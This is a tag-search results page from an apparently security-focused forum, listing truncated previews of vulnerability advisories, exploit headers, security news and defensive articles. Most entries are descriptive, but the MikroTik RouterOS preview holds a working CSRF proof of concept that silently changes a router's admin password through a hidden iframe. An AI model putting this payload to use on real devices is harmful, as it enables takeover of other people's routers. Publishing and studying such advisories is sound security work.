Search the Community
Showing results for tags 'application'.
-
Android Implementation on an indoor positioning system
ioana.alexandra posted a topic in Mobile security
I need an Android application that helps with localization using GPS. The application is partially done. For more information, I am waiting to be contacted.
- 3 replies
Tagged with: localizare, application (and 2 more)
-
| # Title : 4images 1.7.11 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Powered by 4images 1.7.11 | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://www.4homepages.de/ ======================================= Host Header Attack : Vulnerability description : An attacker can manipulate the Host
-
When performing a Web Application Security Assessment, an important step is Fingerprinting which allows for further exploitation by an attacker. So as a security researcher/pentester, we should do well at fingerprinting the web server, which gives a lot of information like application name, software version, web server info, OS, and more. This helps for known vulnerabilities, researching vulnerabilities and exploiting. So here I will discuss some techniques which are required for this task: Finger Print Methodology How to perform this activity: obviously for an attacker there is no hard and fast
Tagged with: application, file (and 3 more)
-
Nektra SpyStudio is an all-in-one tool for cyber security analysts, DevOps, QA engineers, and developers. This multi-tool is useful for application virtualization, troubleshooting Windows applications, application performance monitoring, malware analysis, and as a process monitor complement. Get it now. Read more at SharewareOnSale.
Tagged with: analysis, application (and 3 more)
-
In a previous article of mine, I discussed Cross Domain Messaging in HTML5. This article walks you through another feature, called local storage, and its security. Local Storage Local storage is one of the new features added in HTML5. It was first introduced in Mozilla 1.5 and eventually embraced by the HTML5 specification. We can use the local storage feature in HTML5 by using the JavaScript objects localStorage and sessionStorage. These objects allow us to store, retrieve and delete data based on name value pairs. The data processed using the localStorage object persists through browser shut
Tagged with: application, data (and 3 more)
-
In this world of the web, we have seen various common attacks like XSS, Clickjacking, Session Hijacking, etc. Various HTTP headers are introduced to defend against these attacks in a simple and easy fashion. In this series of articles, we will see various headers available to protect against common web attacks and we will also see a practical approach of how to implement them in a simple PHP based application. The focus of this series is to give developers a practical touch of how these common attacks can be prevented just by using some HTTP headers. We will setup a vulnerable application to u
Tagged with: application, headers (and 3 more)
-
Defense in depth is dead. The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter. During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,” Pete said. “With apps strewn across the internet, if a corporation thinks they can build perimeter around all their apps then they are nuts.” By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and dev
Tagged with: application, data (and 3 more)
-
Details ======= Product: F5 BIG-IP Application Security Manager (ASM) Vulnerability: Web Application Firewall Bypass Author: Peter Lapp, lappsec () gmail com CVE: None assigned Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Should apply to all releases. Fixed Version: None Summary ======= The F5 ASM is a web application firewall designed to protect web applications from attacks. Due to the way that the system processes JSON content, it's possible to bypass the ASM using a crafted request to a URL that processes both JSON and regular URL encoded requests. The vendor has acknowledged that
Tagged with: application, asm (and 3 more)
-
Web applications are critical to the enterprise infrastructure. Companies rely on them to communicate with partners, clients, shareholders and others, as well as store corporate information, share files, and conduct a host of other operations. These applications are convenient, as their functionality is dependent upon online browsers. However, web applications may have security weaknesses that can expose a single user or the entire organization to multiple threats. Cyber criminals have been focusing on the web in recent years and the trend continues to grow. Cyber attacks are becoming high-pro
Tagged with: application, applications (and 3 more)
-
GE has released a fix for a vulnerability in a library that’s used in several of its products deployed in critical infrastructure areas. The flaw in the HART Device Type Manager library could allow an attacker to crash affected applications or run arbitrary code. The vulnerability in the DTM library affects four of GE’s products, as well as one product manufactured by MACTek. According to an advisory from ICS-CERT, GE has released an updated library that addresses the problem. “The vulnerability causes a buffer overflow in the HART Device DTM crashing the Field Device Tool (FDT) Frame Applicat
Tagged with: application, dtm (and 3 more)
-
There are about 500 of them; I think you'll find something good in there. I'll post more for you, at least once a week. Go on, jump in and set up your redirects, since I know that's what you do. You've terrorized me with them; as soon as I see them, I delete them...
- 1 reply
Tagged with: application, mode] (and 3 more)
-
Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation Vendor: Safer-Networking Ltd. Product web page: http://www.safer-networking.org Affected version: 1.6.2 Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal computer program compatible with Microsoft Windows 95 and later. It scans the computer hard disk and/or RAM for malicious software. Desc: The application suffers from an unquoted search path issue impacting the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D. This could potentially allow an authorized but n
Tagged with: application, local (and 3 more)
-
Security researchers at IBM have uncovered a bug in cloud storage service provider Dropbox's software development kit (SDK) that potentially leaves millions of Android users open to attack. Researchers at IBM's X-Force Application Security Research warned that the 'DroppedIn' flaw affects many applications using the Dropbox SDK. "It allows attackers to connect applications on mobile devices to a Dropbox account they control," explained vice president of IBM Security Caleb Barlow. "This vulnerability may affect any Android app that uses the Dropbox SDK versions 1.5.4 to 1.6.1, and can be exploi
-
Threat Level: High Severity: High CVSS Severity score: 7.0 Impact: Complete Integrity, Confidentiality, and Availability violation. EBay Reference: #EIBBP-31480 Vulnerability: (1) Unauthenticated Cross-Site Scripting Vulnerability (1) Filtration Bypass Vendor Overview “eBay Inc. is an American multinational corporation and e-commerce company, providing consumer to consumer & business to consumer sales services via Internet. It is headquartered in San Jose, California, United States. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and
Tagged with: application, ebay (and 3 more)
-
1 Introduction The Dropbox SDK is a library that developers can download and add to their products. This library provides easy access to Dropbox features, such as downloading and uploading files, via a simple set of APIs. AppBrain provides statistics as to the prevalence of the use of the Dropbox SDK on Android [1]. According to these statistics, 0.31% of all applications use the Dropbox SDK. Of the top 500 apps in the Google Play Store, 1.41% use the Dropbox SDK. Interestingly, 1.32% of total app installations and 3.93% of app installations of the top 500 apps use the Dropbox SDK, respectivel
Tagged with: android, application (and 3 more)
-
MikroTik RouterOS < v5.0 Admin Password Change CSRF Vulnerability by @SymbianSyMoh</b></h1></br> <input type="submit" value="Do it" onclick="var btn=document.createElement('IFRAME');btn.src=' [url]http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok';btn.width='0';btn.height='0';btn.id='myIframe';document.body.appendChild(btn);alert('Pwned[/url]') <http://s.bl-1.com/h/mPQQyg5?url=http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&passwo
Tagged with: application, csrf (and 3 more)
-
In the first part of this series, we covered the Top 5 OWASP ProActive Controls and learned how they can prove to be of great use in securing applications. In this part, we will look at the last 5 OWASP ProActive Controls and learn more about them. Protect Data and Privacy It helps to protect our data inside a database. Sensitive data like passwords, credit card details and bank account details etc. should be stored in encrypted or hashed format inside a database or chosen data storage. One should not use encryption and hashing interchangeably, as encryption and hashing are entirely differe
Tagged with: application, data (and 3 more)
-
What is OWASP ProActive Controls? In one line, this project can be explained as “Secure Coding Practices by Developers for Developers”. OWASP ProActive Controls is a document prepared for developers who are developing or are new to developing software/application with secure software development. This OWASP project lists 10 controls that can help a developer implement secure coding and better security inside the application while it is being developed. Following these secure application development controls ensures that the key areas of the development cycle have secure coding along with trad
Tagged with: access, application (and 3 more)
-
Document Title: =============== ES File Explorer v3.2.4.1 - Path Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1435 CVE-ID: ======= CVE-2015-1876 Release Date: ============= 2015-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1435 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== ES File Explorer is a free all-in-one including a file manager & application & tasks, support for
- 3 replies
Tagged with: application, file (and 3 more)
-
I thought I'd also offer something to the community, since I've only been asking until now
- 5 replies
Tagged with: application, mode] (and 3 more)
-
With this utility you can compare two PE-module files (exe,dll,...). Pediff.dll uses Levenshtein distance algorithm to find identical and/or similar functions in two binaries. There's an option to import .map file for first binary and remap it correctly to second module. External text differ application can be easily integrated. Archive includes C++ source code - class which allows you to write your own . Download: Zippyshare.com
Tagged with: application, easily (and 3 more)
-
Kaseya Browser Android Path Traversal Affected Versions: Kaseya Browser 7.0 Android PDF: http://www.security-assessment.com/files/documents/advisory/Kaseya_Browser_Android_Path_Traversal.pd
Tagged with: android, application (and 3 more)
-
XSS or Cross Site Scripting is a web application vulnerability that occurs when untrusted data from the user is processed by the web application without validation and is reflected back to the browser without encoding or escaping, resulting in code execution at the browser engine. Types of XSS: Reflected or Non-Persistent XSS; Stored or Persistent XSS; DOM based XSS; mXSS or Mutation XSS. Read more: http://dl.packetstormsecurity.net/papers/general/ultimate-xss.pdf
Tagged with: application, browser (and 3 more)
-
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user supplied input before processing it. These two flaws led to a vertical privilege escalation. This can be achieved by a simply tam
Tagged with: 2.1.0, application (and 3 more)